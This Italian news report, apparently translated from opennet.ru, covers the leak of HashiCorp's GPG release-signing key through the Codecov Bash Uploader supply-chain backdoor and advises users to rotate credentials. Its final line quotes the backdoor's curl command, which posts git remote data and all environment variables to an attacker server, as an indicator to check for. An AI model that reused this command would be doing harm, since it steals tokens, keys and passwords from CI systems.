HashiCorp, nota per lo sviluppo degli strumenti open source Vagrant, Packer, Nomad e Terraform, ha annunciato la fuga della chiave GPG privata utilizzata per creare firme digitali che verificano le versioni. Gli aggressori che hanno ottenuto l'accesso alla chiave GPG potrebbero potenzialmente apportare modifiche nascoste ai prodotti HashiCorp verificandoli con una firma digitale corretta. Allo stesso tempo, la società ha dichiarato che durante l'audit non sono state identificate tracce di tentativi di apportare tali modifiche.
Attualmente, la chiave GPG compromessa è stata revocata e al suo posto è stata introdotta una nuova chiave. Il problema riguardava solo la verifica utilizzando i file SHA256SUM e SHA256SUM.sig e non interessava la generazione di firme digitali per i pacchetti Linux DEB e RPM forniti tramite releases.hashicorp.com, nonché i meccanismi di verifica dei rilasci per macOS e Windows (AuthentiCode) .
La perdita si è verificata a causa dell'utilizzo dello script Codecov Bash Uploader (codecov-bash) nell'infrastruttura, progettato per scaricare report di copertura da sistemi di integrazione continua. Durante l’attacco alla società Codecov, nello script specificato è stata nascosta una backdoor attraverso la quale le password e le chiavi di crittografia venivano inviate al server degli aggressori.
Per hackerare, gli aggressori hanno approfittato di un errore nel processo di creazione dell'immagine Docker di Codecov, che ha permesso loro di estrarre i dati di accesso a GCS (Google Cloud Storage), necessari per apportare modifiche allo script Bash Uploader distribuito dal codecov.io sito web. Le modifiche sono state apportate il 31 gennaio, sono rimaste inosservate per due mesi e hanno consentito agli aggressori di estrarre informazioni archiviate negli ambienti dei sistemi di integrazione continua dei clienti. Utilizzando il codice dannoso aggiunto, gli aggressori potrebbero ottenere informazioni sul repository Git testato e su tutte le variabili ambientali, inclusi token, chiavi di crittografia e password trasmesse ai sistemi di integrazione continua per organizzare l'accesso al codice dell'applicazione, ai repository e ai servizi come Amazon Web Services e GitHub.
Oltre alla chiamata diretta, lo script Codecov Bash Uploader è stato utilizzato come parte di altri uploader, come Codecov-action (Github), Codecov-circleci-orb e Codecov-bitrise-step, i cui utenti sono anch'essi interessati dal problema. Si consiglia a tutti gli utenti di codecov-bash e prodotti correlati di verificare le proprie infrastrutture, nonché di modificare password e chiavi di crittografia. Puoi verificare la presenza di una backdoor in uno script dalla presenza della riga curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || VERO
Fonte: opennet.ru